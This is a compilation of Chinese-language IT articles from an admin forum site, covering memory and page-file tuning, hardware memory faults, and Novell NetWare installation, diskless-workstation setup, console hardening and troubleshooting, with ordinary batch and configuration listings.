    过一段时间后打开这个CVS文件，我们可以看到如下内容的条目。
    这个日志文件记录这一段时间中页面文件的使用情况，注意这里的单位是%，而不是MB。通过简单的计算，我们就可以得到页面文件的最小尺寸，公式是“页面文件尺寸X百分比”。比如这个例子中，虚拟内存最大的使用比率是31%，300MBX31%=93MB，这个值就是虚拟内存的最小值(注意，300MB是前面的设置的临时值)。
    如果物理内存较大，可以考虑将页面文件的“起始大小”和“最大值”设置为相等，等于上一步中计算出来的大小。这样硬盘中不会因为页面文件过渡膨胀产生磁盘碎片，其副作用是由于“最大值”被设置的较小，万一偶然出现虚拟内存超支的情况，可能会导致系统崩溃。
    设置页面文件
    现在回到“虚拟内存”的设置对话框中选择自定义大小并按照上面的计算结果分别设置“初始大小”和“最大值”。这里我们将“初始大小”设置为91M，而将“最大值”设置成了200M，这样比较保险
    对页面文件进行碎片整理
    Windows XP运行时需要大量访问页面文件，如果页面文件出现碎片，系统性能将会受到严重影响，而且会缩短硬盘的使用寿命。所以我们很有必要对页面文件定期进行碎片整理。
    不过别忘了，页面文件是系统关键文件，Windows XP运行时无法对其进行访问。所以对它进行碎片整理并不是一件容易的事情。我们有两种方案可以选择，一是安装Windows双系统，然后启动另外一个Windows对Windows XP所在的分区进行碎片整理。二是使用专门的工具软件，比如System File Defragmenter等。
--------------------------------------------------------------------------------

《我是网管》论坛，打造中国网管第一品牌！


用多重启动优化Novell无盘站的内存

《一键清理系统垃圾》

用多重启动优化Novell无盘站的内存

    目前，Novell无盘工作站在教学网、证券交易网等局域网中仍占主导地位，随着各种应用软件的层出不穷，这就要求Novell无盘工作站以不同的内存配置来启动，以便适应不同的应用软件对内存的要求。本文就Novell无盘工作站运行Foxpro2.5 for DOS等软件需要启动时配置扩充内存的情况和运行Windows3.2只需配置基本内存的情况进行了详细的阐述。
    首先，准备好一张空白盘，在其上建立自动批处理文件AUTOEXEC.BAT，内容如下：
    @ECHO OFF
    SET NWLANGUAGE=ENGLISH
    PROMPT ＄P＄G
    CLS
    GOTO ％CONFIG％
    :ODI－1
    LH LSL
    LH RPLODI
    LH NE2000
    LH IPXODI
    VLM
    GOTO EDN
    ：IPX
    IPX
    NETX
    GOTO END
    ：END
    F：
    LOGIN USER
    再在盘上建立系统配置文件CONFIG.SYS，内容如下：
    [MENU]
    MENUCOLOR=7，1
    MENUDEFAULT=ODI－1,10
    MENUITEM=ODI－1,ODI FOR EMM386.EXE NOEMS FOR FOXPRO25
    MENUITEM=IPX,FOR WINDOWS3.2
    [COMMON]
    DEVICE=HIMEM.SYS
    FILES=80
    BUFFERS=40,0
    STACKS=9,256
    [ODI－1]
    DEVICE=EMM386.EXE NOEMS
    DOS=HIGH,UMB
    LASTDRIVE=Z
    [IPX]
    DOS=HIGH
    LASTDRIVE=E
    这里，工作站中普通用户是用USER用户登录，网卡是NE2000。基本内存是用于IPX协议，扩展内存是用于IPXODI协议。再把一些必须的LSL、RPLODI、NE2000、IPXODI、IPX、VLM、NETX等网络文件及HIMEM.SYS、EMM386.EXE等DOS内存管理文件复制到这张软盘上。
    然后，在工作站上用超级用户SUPERVISOR登录，把做好的软盘插入软驱，在服务器的系统卷SYS的SYSTEM目录下运行DOSGEN，形成了新的启动文件NET＄DOS.SYS，把此文件移至LOGIN目录下，覆盖原来的启动文件；并把软盘上的AUTOEXEC.BAT文件拷至此目录覆盖原自动批处理文件，至此，大功告成。这时，启动工作站就会出现DOS启动菜单1.ODI FOR EMM386.EXE NOEMS FOR FORXPRO25,2.FOR WINDOWS3.2。由此，可以根据不同应用软件对内存的要求，通过选择菜单进入不同的内存配置环境。

返回


由内存引起的三种罕见故障

《一键清理系统垃圾》

由内存引起的三种罕见故障

故障一：由于使用劣质内存导致无法正常安装系统。

    朋友的一台老机器需要重装系统，请笔者去帮忙。配置为：微星6340主板，毒龙650，PC-133远瀚128M内存，杂牌TNT2显卡，WD20G硬盘。用ghost软件克隆，7分钟多一点就完成了。朋友觉得一些软件版本太旧，一些软件根本没用，就要求重做一个镜像文件。格式化C盘后，用安装光盘重装Windows。即将完成时，系统突然提示无法复制文件，安装失败。更换安装光盘后，依旧在原处卡住。

    无奈之下，用ghost克隆一个系统，再用各种测试软件检测。首先使用3Dmark2000测试，通过测试，一切正常。再用Goldmemory（GM）测试内存，在约80%处，软件报错，提示退出。找来一根现代64M内存再次重装系统，故障排除。

    经仔细观察，发现此根远瀚内存有一颗内存颗粒与PCB板的一个焊点有极细微断裂，如不用心观察，根本无法识别。朋友为了节省时间，一直使用ghost克隆软件安装系统，故障长期隐而未发。等到发现，已过质保期，除自认倒霉外别无他法。事后分析认为，此故障是由于使用质量不过关的内存，一颗内存颗粒长期处于接触不良，时好时坏的状态所造成的。又由于ghost克隆软件是一种可以强行将数据写入硬盘的软件，故障未被发现。因此，笔者建议各位朋友在购机时，记得多用几种测试软件测试，以免最后追悔莫急。

    故障二：由于使用曾损坏的内存导致无法安装系统。

    笔者一昔日同窗，购机数年，一直使用正常。日前突然来电说系统崩溃，需要重装系统。配置为：华硕P2L97，PII233超262，两条现代32M内存，小影霸Riva128ZX显卡，启亨呛红辣椒声卡，昆腾4.3G硬盘。笔者赶到后，首先将CPU降回初始频率，再格式化硬盘，最后安装系统。

    安装进行中，系统提示地址错误，安装终止。拆下内存检查，发现其中一条的金手指早已经被烧的面目全非，在少掉的地方被人用焊锡点了两个点权充作金手指用，从痕迹上来看，应该是很久远的事情了，而且此人的焊工极差，应付了事。笔者的朋友对电脑硬件基本上不懂原理，如何能做这样的事情呢？唯一的结论是买机器时被商家给坑了，以次充好。然而，这条内存竟然奇迹般的用了那么久才出问题，实在让人很困惑。

    时值内存涨价，同窗好友因此而大出血。事后回想，电脑硬件是精密产品，虽然在出现大的问题后可以通过一定的技术手段加以修理，但是限于个人的条件和能力，一般不可能将损坏的元件修复如新。故笔者再次提醒各位朋友，购机时千万注意仔细验货，以免被一些不法商家偷梁换柱，以次充好。

    故障三：由于使用与主板不兼容的内存导致CMOS初始化失败，无法开机。

    一日，一熟人来电求助，说买了两个多月的机器突然出了问题，无法启动。他的配置为：微星K7Tpro，雷鸟750，PC150KingMax128M，耕升Geforce2MX黄金版，IBM腾龙二代30G，世纪之星银版电源。打开机箱后开机，发现主板上的四个D-LED指示灯全部为红色。根据主板说明书，此时代表CMOS初始化失败或CPU自检失败。

    由于AMD的K7系列CPU核心极为脆弱，因风扇扣具过紧，安装不当造成的CPU损坏多的不胜枚举。笔者将CPU取下后仔细观察，未发现有损坏。安装好风扇后再次开机，故障依旧。至此，笔者认为是主板的BIOS损坏，但并不死心，随之将显卡、内存统统卸下，想确认一下。开机后，主机PC喇叭发出长音报警，提示内存检测失败。观察后发现，第二个D-LED指示灯变为绿色。关机，插上KingMax内存。随后开机，D-LED指示灯全红。找来一条现代128M内存插上机器，故障排除。元凶就是那条KingMax PC150 128M内存，PCB版本1.1。

    后经过查询，得知此版本的内存条兼容性较差，尤其是在与KT133的主板搭配使用时，出现不兼容的机率更高。这是一例由个体差异引起的不兼容现象，但是互不兼容的现象直到使用了两个多月后才出现，在此之前一切正常，这样的情况实属少见。最后的解决方案是商家退回差价，换回一根PC133的KingMax内存条。所以各位朋友在购机时请充分了解自己的需要，不要轻易相信商家的推荐，这样才能保证自己的机器少出问题。


在Windows 2003中安全地释放内存资源

《一键清理系统垃圾》

返回总目录 上一页 目录页

在Windows 2003中安全地释放内存资源

    经常看到有朋友在论坛上诉苦说需要释放内存，其实如果你安装了Windows 2003的话，那么并不需要寻求那些需要注册才能长久使用的第三方内存管理软件。因为Windows 2003已经自带了一个名为Empty.exe的小程序，它可以用来释放某些应用程序在占用大量内存时不能及时释放的那部分资源，与那些第三方软件内存管理软件不同的是，Empty.exe不会强迫系统全部释放资源，而是仅仅释放必要的资源，这样就不会加重硬盘的负担了。

    Empty.exe的使用相当简单，命令格式如下：

    Empty.exe pid(pid指进程的product id)或者是Empty.exe task-name(task-name指进程的名称)

    最后需要说明的是，Empty.exe仅仅能在Windows Server 2003中使用，Windows 2000/XP中就无缘使用了。


内存故障

《一键清理系统垃圾》

返回总目录

内存故障

◎4.2.4常见存储介质的修复CD、CD-R、CD-RW、U盘和数码相机内存卡的修复
◎Win2000 硬盘/内存完美优化
◎电脑综合诊治之内存故障详解
◎Windows XP 家庭用户内存优化指南
◎解决VXD导WIN98内存“丢失”问题
◎“内存不足”的解决方法
◎解决内存出错
◎解决四例内存常见故障
◎另类的BIOS与内存冲突故障
◎论Windows server 2003中安全释放内存
◎内存
◎内存导致的异常故障
◎内存故障处理
◎内存故障分析大全
◎内存故障与分析
◎内存混插故障一例
◎内存颗粒断脚处理
◎内存六种异常故障排除法
◎内存品质的细微体现
◎内存条维修DIY
◎剖析Windows用1G内存还慢的原因
◎设置虚拟内存
◎双系统共用虚拟内存
◎为NetWare服务器添加内存和硬盘
◎虚拟内存常见问题的解决办法
◎虚拟内存设置终极攻略
◎用多重启动优化Novell无盘站的内存
◎由内存引起的三种罕见故障
◎在Windows 2003中安全地释放内存资源

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


NetWare 5安装技巧

《一键清理系统垃圾》

返回总目录 目录页 下一页

NetWare 5安装技巧

    Netware 5（在开发期间曾被称为Moab）因其显著改进的安装界面而脱颖而出。它允许管理员在进行冗长的文件复制之前指定各种系统参数，不同于过去需要用户在文件复制过程中回答各种问题，这样安装人员就不必守候在服务器旁边了。NetWare 5只需要10分钟的监控时间，在此后的文件复制过程中管理员可以处理其他事务。

    安装向导

    NetWare 5中包括一个图形用户界面的安装向导，用于服务器的配置。它部分地代替了原先管理员所熟悉的Cworthy字符界面。但是在安装过程的初期，仍会出现基于文本或字符的界面，让您在忽然进入GUI世界之前有所准备。
    图1显示的是安装向导的第一个窗口。

    图1

    虽然这个窗口中的图形界面还很简单，但其交互特性在图2所示的文件系统窗口中就显得十分重要了。

    图2

    在这个窗口中以图形的方式显示了现有的和新建的分区，以及在新服务器上安装的各种驱动器。与基于纯文本的方法相比，以这种方式继续进行安装是一件十分简单的事情。

    在向导中周游

    尽管Novell推荐使用鼠标在安装向导中周游，但这并不是必须的。可以使用键盘的快捷键发出各种命令，用数字键区上的方向键来移动光标（必须将NumLock打开才能用键区上的方向键移动光标）。
    注意：在向输入域输入数据时，安装向导采用两阶段接收方式。比如：输入您的服务器名称后按下Enter键，系统不会转移到下一屏。必须再按下Next以前进到下一屏。这是因为安装软件需要从输入模式（当您输入名称时）转换到处理模式（当您单击Next按钮时）。

    选择IPX

    如果选择的是IP安装，那么当服务器收到IPX请求时，系统将自动提供对IPX的被动支持。这种被动的IPX支持又被称为“兼容模式”。系统自动启用兼容模式，为需要IPX协议的应用程序提供服务。
    但是如果需要完整的IPX支持，请选中支持IPX的复选框，安装向导会像在传统的NetWare安装过程中那样装载IPX并将它绑定到LAN网卡上。它将自动发现所有在网络上存在的IPX地址，进行IPX配置（可以在“协议定制”窗口中修改这些地址，在以后的AppNote中将对这个窗口进行解释）。

    在混合协议环境中安装NetWare 5

    如果NetWare 5要与网络上的IP和IPX协议共存，则必须在树型结构中包括一个兼容模式网关。该网关必须在存放着主副本的服务器上装载，以保证NDS能够正确通信。另一方面，只支持IPX的服务器将不能与树型结构联接。
    定制安装
    图形安装界面的开始几屏似乎仅仅给出了使用NetWare 5新服务器的一些缺省的参数组。定制窗口实际上出现在接近安装结束的时候。图3中的“安装概要”窗口显示了将要安装的产品列表。

    图3

    注意在对话框底部有一个“定制”按钮。选择需要修改配置参数的产品，安装向导将显示“产品定制”窗口。比如选择“NetWare操作系统”将显示类似于图4的窗口。

    图4

    使用该窗口可以改变以下参数：服务器ID号、服务器上安装的语言（可以超过一种）、在服务器重启时装载还是禁用ConsoleOne、显示将要安装在服务器上的许可证信息、选择将要安装或配置的子组件。
    比如操作系统的子组件包括文件系统、协议和NDS。如果单击“文件系统”，安装向导将显示图5所示的“文件系统属性”窗口。

    图5

    现在可以修改服务器上分区、磁盘和卷的有关设置。
    单击“协议”，可以修改服务器的IP地址、IPX网络地址（如果同时使用两组协议），并对IPX兼容模式进行配置。
    NetWare 5将自动检测现存的IPX地址。如果需要为服务器指定一个不同的地址，该窗口将提供定制功能。
    单击“NDS”，安装向导将显示图6所示的“NDS属性”窗口。

    图6

    在该窗口中可以修改：
    * NDS树型结构的名称、服务器上下文和管理员名称
    * 时区和夏令时设置
    * 时间同步类型（单一、引用、主要和次要）
    这些都和此前安装向导给出的选项相同。但现在您就可以将NDS计算夏令时调整的方法从缺省值修改为所需要的方法，而且在向现有的NDS树型结构中安装多于一个的NetWare 5服务器时，时间同步类型的选择是非常重要的。

    注意事项

    1.NetWare 5对硬件有新要求，其中需要注意的是它要求带HAM驱动的网卡。在1997年11月1日前认证的旧DMS网卡存在一个问题。在NetWare 5“虚拟存储”特性的实现中，那些假定逻辑地址和物理地址相同的LAN驱动程序会导致间歇性的数据错误。这一问题在旧的DMA网卡中最为常见。请与供应商联系以获知您的网卡驱动是否有上述问题。
    所有经过NetWare 5认证的网卡和驱动程序都不会出现这一问题。
    已知那些旧的使用内存地址0A0000的网卡也有问题，在服务器装载时该地址与新服务器的图形启动位图发生冲突。如果要修补这一问题，或者以另一个内存地址重新配置网卡，或者使用下面的命令装载服务器：
    SERVER-NL
    2.为了进行“服务器对服务器”的安装，两台服务器必须使用相同的协议。该协议不一定是系统所用的缺省协议或主要协议。比如：如果源服务器是基于IPX协议的，则目标服务器必须使用IPX协议联接到源服务器上；如果源服务器是基于IP协议的，则目标服务器也必须使用IP协议。
    如果在源服务器上使用安装光盘而不是将文件复制到服务器上，那么必须使用特殊的CDINST.NLM模块在源服务器上装配好CD-ROM卷。不要使用CDROM.NLM模块，因为它使用NSS而不支持“服务器对服务器”安装。
    3.使用安装向导可以在NetWare 4.11服务器上向NetWare 5进行本地升级。但如果NetWare 4.11服务器装载了下述模块，请不要进行本地升级。
    * DHCP
    * NFS
    * NetWare/IP
    * NetWare AppleTalk文件和打印服务
    * Novell Web服务器
    * Border Manager
    在这种情况下，应该将服务器移植到新的NetWare 5系统上或在树型结构中保留4.11服务器。
    从树型结构的下部而不是根部开始升级这些服务器，与从根部开始升级相比，将使NDS更容易处理NetWare 5的变化。
    首先选择那些将会保存或者正在保存主副本的服务器，然后再安装其他服务器。

返回


Novell 4.11无盘Win95/98安装捷径

《一键清理系统垃圾》

Novell 4.11无盘Win95/98安装捷径

思路
1.在生成Win95版本的netSdos.sys(简称net.w95)之前，和该文件大小为0字节时，巧妙调整修改Win95远程启动(rpl)安装相关文件的配置及操作：删除、拷贝等，生成可引导至Win95/DOS状态的net.w95文件。
2.修改用户注册文件，把Win95整个系统当作一个简单的软件来安装和使用。

要求

1.服务器(jxsx－server)和工作站为586/100以上兼容机，16M或32M RAM，网卡PCI或NE2000(本文以PCI为例)。

2.Novell版本4.11或以上，工作站3～4台，至少有一台已安装Win95及相关客户软件，＊.vlm,net.cfg,vlm.exe

等。

    一、Win95版本net.w95文件巧妙生成

    1.运行netsetup.exe完成服务器共享的安装设为：jxsx－sever\sys\sbs

2.修改msbatch.inf文件
    [setup]
    installtype=3
    uninstall=0
    display=1
    [network setup]
    hdboot=0
    rplsetup=1
    network station setup=1
    display network setup=1
    ;installdir=″jxsx\sys\winuser″
    display=1
    3.在无盘工作站1号机上，在DOS 622方式下以admin注册运行
    map f:=sys:\sbs
    f:
    setup /t:f:\temp
    根据安装向导，选择“远程无盘启动方式运行Windows”；
    设置机器(用户)目录f:\winuser(sys为系统卷)
    4.从装有Win95的工作站2号机，以DOS 6.22无盘方式启动至网络(admin注册)，转到f:\winuser目录，观察该目录下当产生config.win文件时暂停1号机的“下一步”安装，编辑config.win文件内容为：
    device=himem.sys
    device=emm386.exe ram
    device=ramdrive.sys 1440/A
    dos=high,umb
    files=64
    lastdrive=z
    同时将sbs下的himem.sys,emm386.exe,ramdrive.sys拷贝至该目录和suboot目录下(emm386.exe文件一定不能少)。
    5.在1号机上继续安装，挂起所有硬件检测，网络安装时只要网卡设置、驱动程序添加正确，其它如协议等概可不管，也无须改动删除等。直到“复制完所有文件”后暂停，切勿选择“完成安装”，这时的suboot目录下有重大“秘密”。
    6.到2号机上的f:\winuser下，这时发现netSdos.sys大小为0字节，说明suboot下的文件尚未打包——即为“秘密”，进入suboot修改：
    1Autoexec.bat文件
        lh lsl
        lh pciodi
        lh ipxodi
        copy a:\command.com c:\
        copy ＊.vlm c:\
        copy vlm.exe c:\
        set comspec=c:\command.com
        c:
        vlm.exe
        f:
        login user
    2删除net.win、net.bak、net.cfg，并且将2号机硬盘c:\net下的pciodi.com、＊.vlm、vlm.exe、net.cfg、lsl.com、ipxodi.com文件拷贝到suboot下，同时复制net.cfg文件为net.bak和net.win。
    7.在1号机上选择“完成安装”，几秒钟后在2号机上运行dir.sys可看到netdos.sys由0变为1.2M左右，说明系统根据suboot下的config.sys、Autoexec.bat的设置将该目录下的所有文件打包到netSdos.sys(即为net.w95)中去了，这时将netSdos.sys、autoexec.bat拷贝至f:\login下，便可无盘引导至Win95/DOS状态了，至此Win95版本的远程自举net.w95文件顺利生成。

    二、把Win95整个系统当作一个简单的软件来安装

1.在2号机上以无盘进入网络(admin注册)，进入c:\windows，运行subst a: c:\windows——将a:虚拟成为c:\windows目录(一定要做)，运行a:>win.com，打开“我的电脑”图标，在f:\建立winbak文件夹，将c:\windows

及其子目录下的所有文件和c:\根目录下的所有＊.bat、＊.sys等改为正常属性进入dos－prompt方式。
    xcopy c:\＊.＊ f:\winbak\ /s/e
attrib c:\＊.＊ ＋s,＋h,＋r
;以免Win95单机不能运行。
attrib f:\winbak\＊.＊ ＋r,＋s,＋h
flag f:\winbak\＊.＊ sh di /s
；设置共享，禁止删除属性。
    2.修改user用户注册文件login script为：
    map display on
    map f:=sys:\
    map s16:=sys:\winbak\windows\
    map s16:=sys:pubcic
    map s16:=f:login
    map root c:=sys:\winbak
    map root a:=sys:\winbak\windows
    comspec=c:\command.com
    3.在f:\login下编辑win.bat:
    login user
    c:
    win.com
    重新启动所有工作站无盘进入网络便大功告成!
    特点：本方法为万能方法，可永久删除共享安装目录(sbs)，减少了繁琐的machines.ini文件的编辑过程；其它软件(如：显卡驱动，声卡驱动等)可在网络上顺利安装——就像在硬盘上一样。

返回


Novell Intranetware网故障记实

《一键清理系统垃圾》

Novell Intranetware网故障记实

   故障现象

    我单位一台Novell服务器在正常引导加载所有设备驱动程序以及MOUNT 所有卷后控制台时，提示DHCPIO.NLM，导致SERVER内存页面错误而后服务器挂起，不能进入控制台。

    解决过程

    因为计算机提示DHCPIO.NLM 出错，我以为是DHCP服务出了问题，所以我在服务器引导进DOS后用诊断方式SERVER -NA 引导服务器，进入控制台后用LOAD EDIT 方式修改AUTOEXEC.NCF 文件，注销LOAD DHCPSRVR.NLM 行，再启动计算机正常引导，至此确定DHCP模块导致服务器异常。我们怀疑DHCPIO应用文件出错，于是用安装程序卸载DHCP服务，而后重装DHCP 模块，修改AUTOEXEC.NCF文件加载DHCPSRVR服务，重新启动服务器，但问题依旧。我们重新安装了与TCP/IP相关的所有模块，包含DNS，FTP，NIS等，但问题还是没有解决。
    我不知该怎么办，求助Novell回答肯定是从头开始安装，但我的数据怎么办？我当然不甘心。于是我在不加载DHCP的情况下从客户机登录进网，用文本编辑器查看每一个与TCP/IP相关的文件，我当然从与DHCP相关的查起，我发现在SYS：ETC\目录中含有一个DHCP四个字符开头的文件，其文件长度为4M多，而且修改时间为故障前一天。我知道DHCP相关的记录文件是动态更新的，于是我怀疑某台工作站在往服务器发送请求数据时，服务器记录下了不符合DHCP规范的数据从而导致加载DHCP模块时出错。
    我知道在ETC目录下的文件大都是配置文件，于是试着将以DHCP打头的4M的文件删除，重新在控制台加载DHCPSRVR模块，此时我终于看到了正常的DHCP控制台信息。客户端TCP/IP申请IP地址成功。

    经验小结

    当网络出现故障时，从控制台识别相关的出错信息，而后确定问题关键，才能找出解决问题的方法。本文的情况较特别，不过我们在发现问题的时候总可以用Server -NA -NS 的方法一项项排除，确定问题所在，而后通过客户端检查相关配置文件。还有一点就是耐心查阅相关英文原版操作说明。

返回


Novell NetWare控制台的安全保护

《一键清理系统垃圾》

Novell NetWare控制台的安全保护

在多年使用和维护Novell NetWare 的过程中，我们积累了不同的经验，也吸取了不少的教训。下面笔者就Novell NetWare 控制台安全保护方面的经验加以介绍，以供教学和从事公用计算机机房管理者的同行以及其他网络管理者们参考。

一、Novell NetWare 3.X的安全问题

我们使用的Novell NetWare 3.12网络操作系统。在一个机房中连接有近百台微机工作站。每学期在网络服务器上开有学生账户近3000个。

服务器置于机房中，如果某个时候机房值班人员不在机房，上机者就可能会使用服务器控制台。这时控制台的键盘如果没有锁定，那么服务器就可能遇到危险。因为在控制台上使用者可以进入NetWare 内嵌的386DEBUG调试程序(按下键盘上的左SHIFT、右SHIFT、ALT、ESC四键就可进入调试程序）。用该调试程序，使用者可以盗改超级管理员口令，使真正的超级管理员不能管理系统，这样的后果是相当严重的。因此在服务器控制台上，只要键盘没有锁定，任何人都可以在控制台上进入386DEBUG程序。

为了安全起见，我们有必要限制和取消在控制台上使用386 DEBUG程序。在加上锁定键盘，安全系数就更高了。

二、禁止控制台上使用386DEBUG程序

为了取消386DEBUG程序，首先要找准进入386DEBUG程序的入口点，要找准程序的入口点，没有现成的资料可查。只有在386DEBUG程序下分析Server.exe程序（386DEBUG程序是内嵌在Server.exe 文件中的）。由于Server.exe文件很大，要分析它就要事先考虑几种可以进行分析的着手点。经过笔者考虑，应从两方面入手：(1)找键盘中断入口；(2)找读取键盘的程序入口点。下面就介绍笔者分析程序的过程。

（1）找键盘中断入口

当执行Server.exe程序后，系统程序在保护方式下运行。操作系统重新定义了所有中断向量。在386DEBUG下反汇编出来的程序与实模式下的程序有区别，因此要准确获取NetWare 3.12和4.11的中断向量比较困难。

（2）找读取键盘的程序入口

既然读键盘的中断入口不容易找到，那么我们可以通过 IN Al,60H(代码E4 60)指令来找读键盘的程序（程序要处理键盘就离不开这条读键盘口的指令）。并由此找到处理键盘码的程序。用查找命令寻找代码E4 60后，该条指令在程序中的位置见如下程序表：

  NETWARE 3.11

000143EB E460 IN AL,60

......

00014424 C3 RET

00014425 800D3088010002 OR [00018830],02

0001442C C3 RET

0001442D 800D3088010001 OR [00018830],01

NETWARE 3.12

00011278 E460 IN AL,60

......

000113DD C3 RET

000113DE 800D006D01002 OR [00016D00]=00,02

000113E5 C3 RET

000113E6 800D006D01001 OR [0016D00]=00,01

000113ED C3 RET

NETWARE 4.11

0001445F E460 IN AL,60

......

00014579 C3 RET

0001457A 800D30FB010002 OR [SERVER.NLM:DDH_KEYSTATEFLAGS]=00,02

00014581 C3 RET

00014582 800D30FB010001 OR [SERVER.NLM:DDH_KEYSTATEFLAGS]=00,01

00014589 C3 RET

    在程序表中有三个版本的 IN AL,60H指令位置。由该指令位置找到了处理左SHIFT和右SHIFT键的指令。如在NetWare 3.12中（见程序表），地址000113DE处的指令是向00016D00单元做左SHIFT键的标志02。地址000113E6的指令是向00016D00单元做右SHIFT键的标志01。其他两个版本同样是用02、01在同一个单元做左右SHIFT键的标志。

（3）取消进入386DEBUG程序的功能

因为进入386DEBUG需要同时按下四个键，其中包括两个SHIFT键。既然我们在上面（2）中找到了处理SHIFT键的指令位置，那么只要我们将两条指令中任意一条指令中任意一条指令的最后一个数值02或01改为00，也就是当按下两个SHIFT键时，相当于程序只处理其中的一个SHIFT键。所以在控制台上就进不了386DEBUG程序。这样我们的目的就达到了，这个方法可用PCTOOLS修改Server.exe文件，以达到完全取消该程序的功能。也可以在每次开启服务器后，在控制台上用386DEBUG修改内存的程序代码，下次开机同样存在386DEBUG功能。

    我们只去掉一条SHIFT键指令标志的原因是：还要留一个SHIFT来选键盘上的上档符号。如果将两个SHIFT键标志都去掉，那么键盘上就选不到上档符号键，这就影响键盘的使用。

    上面介绍的方法已在三个版本的NetWare操作系统上通过。需要指出的是，由于DOS的环境不一样，执行Server.exe程序后，网络操作系统的程序地址就不一样。上面程序表中的地址是C盘启动DOS6.22后（没有CONFIG.SYS和AUTOEXEC.BAT文件），转入D盘根目录执行Server.exe程序后获得的地址位置。

返回


Novell的秘密武器

《一键清理系统垃圾》

Novell的秘密武器

    Internet对工作方式的革命似乎发生在一夜之间。如今，电子邮件、传真、语音邮件以及Internet正在成为人们之间互相联系的新方式，所以，当你从事商业活动时就需要一个能协助你工作的工具，GroupWise就是这样一个具备驾驭这些新型通讯设备的强有力的工具，它将电子邮件扩展成一个完全的协同工作环境，还将Internet /Intranet技术无缝地集成在一起，只要你会使用电子邮件或流览器，你就能使用GroupWise。我认为，Novell公司的这一升级版本──GroupWise 5.5的价值集中体现在较大地改进了产品的性能。如果，你正在市场上寻觅新信息系统的话，那么，GroupWise 5.5就是一个可给你提供可靠功能的百宝箱。
    在GroupWise 5.5中主要是增强了平台的核心部分，使之更可与Lotus的Domino、微软的Exchange相竞争。具体来讲，它包括：日历和时间计划安排界面的改进，用户可以月为基础查看日历。我觉得在这一版GroupWise中，另一个比较好的性能是使我可与其他用户一起分享我的个人地址簿，而我最喜欢之处是，Novell使连接GroupWise系统与Internet的过程变得更加容易。我还发现，GroupWise 5.5支持Novell的“Native Internet Addressing”（本地互联网访问）。我觉得，这一点与在以前版本中使用STMP（简单邮件传输协议）地址翻译规则相比是一个重大改进。此外，GroupWise 5.5还提供了一些缺省访问格式。在该软件中，我还看到了一些令我高兴的性能是：GroupWise还是不准备让管理员使用NDS组作为GroupWise的分类目录。虽然如此，我在使用SMTP邮寄地址通过Internet给GroupWise分类目录发E-mail时还是遇到了一些问题。
    另外，Novell还捆绑了GroupWise Web Publisher（GroupWise网上出版），它可使用户以典型Web流览器的形式查找GroupWise文件库。这个性能是很独特的，因为GroupWise Web Publisher agent（GroupWise网上出版代理）是实时地给HTML（超文本链接标示语言）提供文件。但GroupWise 5.5不提供从Web流览器上登入、登出文件的能力，而Lotus的Domino可以。测试中我发现，GroupWise Web Publisher agent可以运行在NetWare上，我还能在NetWare4.11服务器上运行它，而我所测试的在这以前的版本中，只支持基于Windows NT 的Web服务器。
    总之，GroupWise 5.5测试版具备了一些突出的优点，如：该系统坚实可靠，内置文件管理性能，改进了在客户机、服务器上的Internet支持。但它也存在一些缺点，如：NDS组不支持E-mail分类目录，不支持SSL，内嵌GroupWise分类目录的SMTP（简单邮件传输协议）寻址还存在些问题等。如果它再增加一些新的性能，它将是一个杰出的软件、Novell的一个秘密武器。

返回


Novell纠错高招

《一键清理系统垃圾》

Novell纠错高招

    Novell网为了方便对用户的管理，为超级用户提供了系统注册正文和系统用户正文，来规划用户的网络环境。用户在上网时，首先执行系统注册正文，一个系统文本编写的好坏直接影响到用户、甚至超级用户对网络资源的使用。
    在Novell网系统注册文本中，可执行外部命令或程序，若有些命令或程序本身一执行即导致“死机”，而超级用户将其加到系统注册文本公共执行部分，将足以导致用户（包括超级用户）一注册上网，即进入“死机”状态，使所有的用户无法使用网络资源。有些系统管理员往往对此束手无策，只好重新安装一遍Novell操作系统。
    实际上，此类问题是可以迅速解决的。本人通过实验摸索找到了两种方法，可以迅速处理上述问题。
    方法一：首先超级用户在有硬盘的机器上，建立一个零字节文件（可采用：type nul>c:\>sk文件名任取）；执行ipx，net6后，转到f：然后输入：
    f:〉login /s c:\〉sk supervisor
    出现：Enter your password？
    输入口令，超级用户即可注册上网。上网后，立即运行syscon，改正系统注册文本的错误，确保用户正常使用网络。
    方法二：从Novell系统软盘上找到attach.exe命令，将其拷贝到本地硬盘（例如C盘）执行ipx，net6后，
    输入：attach服务器名/supervisor，
    输入口令后，超级用户即可上网，余下操作同方法一。
    另外，笔者再向大家介绍两种方法以避免上述错误：
    （1）在系统注册文本中第一行，加入break on，若系统注册文本出现严重错误，可按Ctrl+c或Ctrl+break中断文本执行。一般系统注册文本执行速度太快，无法靠键盘控制终止系统注册文本运行，这一招未必总奏效。
    （2）将无法预料结果的命令（如：有可能使系统挂起）的程序命令，放到supervisor外的用户组执行，这样一旦发生错误，supervisor还可以挽救。

返回


Novell局域网常见问题解答

《一键清理系统垃圾》

Novell局域网常见问题解答

    Novell局域网络有着广泛的应用，它的特点就是管理方便、成本较低并且能够有效防止病毒入侵。但随着软硬件的不断升级和网络规模的扩大，原先的网络需要改造升级或重新安装，所以不可避免会出现一些问题。下面就一些常见问题加以分析，并给出相应的解决办法。
    问题1：服务器网卡驱动程序不能正确加载。
    答 这是安装过程中最常见的一种故障。造成这一故障的原因有多种，一是对于某些厂家的网卡，Netware无法自动识别；二是用户选择的网卡驱动程序有错。要特别注意的是，Netware服务器端网卡驱动程序的扩展名为lan，通常存于驱动程序盘的子目录Server之下，而工作站端使用的网卡扩展名为com或exe，一般存于驱动程序盘的DOS、Windows 9x和Windows NT等目录下，并且不同操作系统所用的网卡驱动程序也不样；三是网卡本身参数配置有错，不能正常工作或者是Netware给网卡提供的中断号或I/O地址缺省值与网卡的配置不相同，遇到这种情况需要手动改为正确的值；最后一种情况是对于EISA和PCI网卡来讲未指定插槽(Slot)号，或其值错误。
    遇到网卡驱动程序不能正确加载的情况时，可以跳过这一步继续后面的安装（Netware 5.x版不行）。在跳过网卡的安装后又何时采用何种方法来安装网卡驱动程序呢？这项工作是在服务器安装完成以后才进行的。重新启动Netware服务器，进入控制台状态，首先加载Install菜单模块，然后把加载网卡驱动程序的有关语句写入Autoexec.ncf文件中。可以按下面格式书写：
    Load 〈ne2000.lan〉 int=〈3〉 port=〈300〉
    Frame=〈ethrnet_802.2〉 name=〈A〉
    Bind ipx to 〈A〉 net=〈1〉
    括号内的值可根据具体情况填写。
    问题2 ：Netware3.x与4.x和5.x无法集成在同一物理网络中。
